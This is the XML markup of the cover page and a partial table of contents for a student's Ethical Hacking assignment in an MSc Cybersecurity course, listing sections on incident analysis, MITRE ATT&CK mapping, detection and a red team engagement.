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40159" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04"/>
    <w:p w14:paraId="2AD482E8" w14:textId="68C05B94" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48CEE1E1" wp14:editId="55E2616C">
            <wp:extent cx="4752975" cy="1895475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="824473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0F163567" w14:textId="19110034" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="0036732C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>University of Wales Trinity Saint David</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAD1EE0" w14:textId="77777777" w:rsidR="0036732C" w:rsidRPr="0036732C" w:rsidRDefault="0036732C" w:rsidP="0036732C"/>
    <w:p w14:paraId="01B2FC8F" w14:textId="30687D8B" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="0036732C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7AB292" w14:textId="77777777" w:rsidR="0036732C" w:rsidRPr="0036732C" w:rsidRDefault="0036732C" w:rsidP="0036732C"/>
    <w:p w14:paraId="4A8FB01F" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Name: Khushi Sangani</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05647B9F" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Student ID: 2520615</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE72B85" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Course: MSc Cybersecurity and Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0E80F" w14:textId="51BBACB2" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="0036732C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Module: Ethical Hackin</w:t>
      </w:r>
      <w:r w:rsidR="0036732C">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B59CF" w14:textId="77777777" w:rsidR="0036732C" w:rsidRDefault="0036732C" w:rsidP="0036732C"/>
    <w:p w14:paraId="0F465AAB" w14:textId="77777777" w:rsidR="0036732C" w:rsidRPr="0036732C" w:rsidRDefault="0036732C" w:rsidP="0036732C"/>
    <w:p w14:paraId="1833657D" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Lecturer: Dr. Mohamed Ghanem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DF7D66" w14:textId="12CF0735" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r w:rsidR="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00053404" w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>April 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549DCA1E" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00053404" w:rsidRDefault="00115C04">
      <w:r w:rsidRPr="00053404">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="557362C9" w14:textId="5548B9E9" w:rsidR="00115C04" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC10EA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Index</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9923" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="993"/>
        <w:gridCol w:w="7654"/>
        <w:gridCol w:w="1276"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="761B9E82" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B06D71B" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sr. No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7076EDFD" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D94F22E" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Page No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="45A8E95E" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C9CCC3A" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46538F3B" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Abstract</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EAAB330" w14:textId="5CA9DF44" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="770E540F" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C0D8613" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DDD7952" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Introduction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2484005A" w14:textId="6AA057EC" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="19079A35" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BBBBBB5" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C1CFD1F" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Incident Summary and Timeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F277D88" w14:textId="1CA6D5DB" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="39D603B0" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53B3A7E3" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E3C97FE" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Adversary TTP Mapping (MITRE ATT&amp;CK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="659FADA8" w14:textId="7C678E03" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="18B4EF4A" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="625841DD" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EE3ADB3" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Root Cause &amp; Security Control Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F8B93E1" w14:textId="34F0E912" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="22B159A5" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="704CA779" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47C1B2A2" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Threat Actor Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CEEDD6C" w14:textId="42FCA17E" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="7C72ED7A" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08C8C784" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="199ACBC0" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Detection &amp; Response Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62875273" w14:textId="18A55FA2" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="3D577DFF" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="600D4A25" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78E24BC6" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Strategic Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C81DF12" w14:textId="69FE9D8B" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="225D3649" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60896BE9" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12FDC667" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Conclusion (Task 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CB12174" w14:textId="3799AB40" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="66A16733" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CF84B82" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C75B4E3" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Executive Summary (Task 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA92948" w14:textId="7E89E882" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="42585477" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59010AA2" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1801D367" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Introduction (Red Team Engagement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1917D523" w14:textId="099BB1A5" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="5B373E0C" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
